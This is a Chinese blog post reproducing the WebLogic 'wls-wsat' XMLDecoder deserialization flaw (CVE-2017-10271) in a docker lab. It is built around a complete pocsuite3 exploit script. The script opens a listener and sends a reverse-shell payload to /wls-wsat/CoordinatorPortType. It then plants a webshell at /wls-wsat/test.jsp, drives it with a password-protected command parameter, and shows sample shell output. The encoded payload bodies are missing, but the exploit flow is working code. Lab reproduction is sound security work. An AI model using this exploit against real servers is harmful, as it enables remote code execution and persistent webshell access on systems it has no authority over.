我是靠谱客的博主 苗条冬瓜,最近开发中收集的这篇文章主要介绍Pocsuite3复现Weblogic ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)目录,觉得挺不错的,现在分享给大家,希望可以做个参考。
概述
目录
- 一、安装pocsuite库
- 二、启动漏洞环境
- 三、编写poc脚本(poc.py)
- 四、主程序调用
- 五、执行输出
一、安装pocsuite库
pip3 install pocsuite3==1.6.6
二、启动漏洞环境
docker run -itd --name weblogic -p 7001:7001 vulhub/weblogic:10.3.6.0-2017
三、编写poc脚本(poc.py)
import re
import time
import base64
import socket
import threading
from collections import OrderedDict
from pocsuite3.api import Output, POCBase, register_poc, requests, OptString, OptInteger # POC_CATEGORY
# Reverse-shell payload, used for the callback.
# Both values are base64 strings whose contents were removed from this page;
# they are decoded with base64.b64decode before use. `console` is the callback
# template that WlsPOC._verify fills in with the local IP and listener port,
# `webshell` is the second-stage payload it POSTs after a callback arrives.
console = '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'
webshell = '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'
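def get_host_ip():
    """Return the local IPv4 address used for outbound traffic, or False.

    A UDP socket is "connected" to 8.8.8.8:80 (no packet is sent for a UDP
    connect); the kernel then selects the outbound interface and
    getsockname() reports its address.

    Returns:
        str: the local address, or ``False`` when the lookup failed. The
        failure is printed rather than raised, as in the original.
    """
    try:
        # `with` closes the socket on every path. The original closed it in a
        # finally block that referenced `s` even when socket() itself failed,
        # which turned that failure into an UnboundLocalError.
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.connect(('8.8.8.8', 80))
            return s.getsockname()[0]
    except OSError as e:
        # OSError covers every socket-level failure (unreachable network,
        # permission, resolution) that the old `except Exception` was meant for.
        print("查询本机ip地址失败.", e)
        return False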
class WlsPOC(POCBase):
    """pocsuite3 PoC for CVE-2017-10271 (WebLogic wls-wsat XMLDecoder deserialization).

    Flow (see _verify): start a local TCP listener in a thread, POST the
    decoded `console` payload to /wls-wsat/CoordinatorPortType and wait for
    a callback; when one arrives, POST the decoded `webshell` payload and
    GET /wls-wsat/test.jsp to check it answers.

    Defender notes, all taken from the requests this class sends: the
    detection surface is a POST with `Content-Type: text/xml` to
    /wls-wsat/CoordinatorPortType followed by an outbound TCP connection
    from the WebLogic host to a foreign port; a successful run leaves
    /wls-wsat/test.jsp on the target (queried with `pwd=023&i=<cmd>`),
    which is an on-disk artifact to look for during incident response.
    The mitigation is the vendor patch for CVE-2017-10271 and blocking
    unneeded egress from the application server.
    """
    vulID = 'CVE-2017-10271'
    vulDate = '2017-10-23'
    vulType = 'RCE'
    name = "Weblogic 'wls-wsat' XMLDecoder 反序列化漏洞"
    appName = 'Weblogic'
    appVersion = '12.2.1.2' # test_version=10.3.6 (the docker image in step 2 is 10.3.6.0-2017)
    desc = "Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。"

    def _options(self) -> OrderedDict:
        """Declare the PoC options.

        The underscore-prefixed options are supplied by the caller (the
        config dict in the main program); reflect_port and reflect_data are
        written by work() at runtime and read back by _verify().
        """
        # supplied by the caller
        o = OrderedDict()
        o["_host"] = OptString('', description='端口可缺省, 比如80的http, 443的https', require=True)
        o["_target"] = OptString('', description='ip或者域名', require=True)
        o["_port"] = OptString('80', description='端口', require=True)
        o["_schema"] = OptString('http', description='协议', require=False)
        o["_command"] = OptString('pwd', description='嵌套shell命令', require=False)
        # set by this class at runtime (see work)
        o["reflect_port"] = OptInteger(0, description='反弹攻击方端口', require=False)
        o["reflect_data"] = OptString('', description='接收反弹消息', require=False)
        return o

    def parse_output(self, result: dict) -> Output:
        """Wrap `result` in an Output: success when truthy, otherwise fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self) -> Output:
        """Attack mode does exactly what verify mode does."""
        return self._verify()

    def work(self, host: str) -> None:
        '''Listener thread body: any received data is enough.

        Binds to (host, 0) so the OS picks a free port, publishes that port
        through the reflect_port option, then waits up to 20 s for a single
        connection and stores the first 1024 bytes it receives in
        reflect_data. On timeout nothing is stored; the socket is closed on
        every path.
        '''
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # 2. bind (port 0 = OS-assigned)
        s.bind((host, 0))
        # 3. listen; the timeout applies to accept() below
        s.listen(1)
        s.settimeout(20)
        self.set_option("reflect_port", s.getsockname()[1])
        # 4. handle one connection
        try:
            c, addr = s.accept()
            msg = c.recv(1024)
            print("==>", msg)
            # NOTE: msg is bytes; it is stored as-is in a string-typed option.
            self.set_option("reflect_data", msg)
            c.close()
        except socket.timeout:
            print("读超时异常")
            pass # read timeout: raised once the timeout elapses; without settimeout the accept would block forever
        finally:
            s.close()

    def _verify(self) -> Output:
        """Run the verification flow described on the class and return an Output.

        Returns a failed Output when the local IP cannot be determined or no
        callback is received; otherwise a success Output whose content
        depends on whether the follow-up GET to test.jsp returned 200.
        """
        # 0. base properties
        url = '{}://{}/wls-wsat/CoordinatorPortType'.format(self.get_option("_schema"), self.get_option("_host"))
        headers = {
            'Host': self.get_option("_host"),
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
            'Connection': 'close',
            'Content-Type': 'text/xml',
        }
        print(url)
        # 1. listener port for the verification callback
        # 1.1 local IP first
        local_ip = get_host_ip()
        if not local_ip:
            return self.parse_output({})
        # 1.2 start the listener
        print("启动监听程序")
        t = threading.Thread(target=self.work, args=(local_ip,), daemon=True) # daemon=True: the listener dies with the main process
        t.start()
        # 1.3 after one second send the callback payload.
        # work() publishes reflect_port only after bind(); this sleep is the
        # only synchronization before reflect_port is read below.
        time.sleep(1)
        payload = str(base64.b64decode(console), encoding='utf-8').format(local_ip, self.get_option("reflect_port"))
        # TLS verification is disabled (verify=False) for all requests in this method.
        requests.post(url, headers=headers, verify=False, data=payload, timeout=10)
        t.join(20) # wait up to 20 s for the listener thread (original comment said 10 s; the call waits 20)
        # 1.4 check whether anything came back
        if not self.get_option("reflect_data"):
            print("判断返回内容")
            return self.parse_output({})
        # 1.5 record the result
        verify = {
            "url": url,
            "payload": base64.b64encode(payload.encode('utf-8')).decode('utf-8'),
            "desc": "Verify Successully.",
            "result": self.get_option("reflect_data")
        }
        # 2.1 second POST: the webshell payload
        payload = str(base64.b64decode(webshell), encoding='utf-8')
        requests.post(url, headers=headers, verify=False, timeout=5, data=payload)
        # 2.2 check whether test.jsp answers. A 200 status alone is treated as
        # success; the body is reported but not inspected.
        check_url = '{}://{}/wls-wsat/test.jsp?pwd=023&i={}'.format(self.get_option("_schema"), self.get_option("_host"), self.get_option("_command"))
        # print(check_url)
        resp = requests.get(url=check_url, headers=headers, verify=False, timeout=5)
        if resp.status_code == 200:
            text = resp.text
            # NOTE(review): the pattern reads 'u0000' here; it most likely lost a
            # backslash in the paste and was meant to strip NUL characters ('\u0000').
            return self.parse_output({
                "verify": {
                    "url": check_url,
                    "payload": webshell,
                    "result": "通过该漏洞入口注入webshell, 用户可借此远程执行命令. RCE got data: {}".format(re.sub(u'u0000', '', text))
                },
                "session": {
                    "method": 1, # 1 = any browser, 2 = IE
                    "desc": "打开浏览器访问URL即可借此远程执行命令",
                    "url": check_url,
                }
            })
        return self.parse_output({"verify": verify})
# Register the PoC class so pocsuite3 picks it up when this file is loaded as a poc.
register_poc(WlsPOC)
四、主程序调用
from pocsuite3.api import init_pocsuite
from pocsuite3.api import start_pocsuite
from pocsuite3.api import get_results
import json
# Scan configuration. The keys mirror pocsuite3's CLI options; the
# underscore-prefixed ones are the custom options declared in
# WlsPOC._options in poc.py. The address is the author's lab target,
# presumably the host running the docker container from step 2.
config = {
    'url': {'http://192.168.1.200:7001'},  # written as a set literal by the author
    'poc': {'./poc.py'},
    '_host': '192.168.1.200:7001',
    '_target': '192.168.1.200',
    '_port': '7001',
    '_schema': 'http',
    '_command': 'whoami',
}
# the config dict takes exactly the same settings as the CLI arguments
init_pocsuite(config)
start_pocsuite()
# Take the last result; if get_results() returns an empty list (e.g. the
# target was unreachable) the .pop() presumably raises IndexError.
result = get_results().pop().result
print(json.dumps(result))
五、执行输出
'''
{
"verify":{
"url":"http://192.168.1.200:7001/wls-wsat/CoordinatorPortType",
"payload":"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",
"result":"b'bash: cannot set terminal process group (1): Inappropriate ioctl for devicen'"
},
"session":{
"method":1,
"desc":"打开浏览器访问URL即可",
"url":"http://192.168.1.200:7001/wls-wsat/test.jsp?pwd=023&i=pwd"
}
}
'''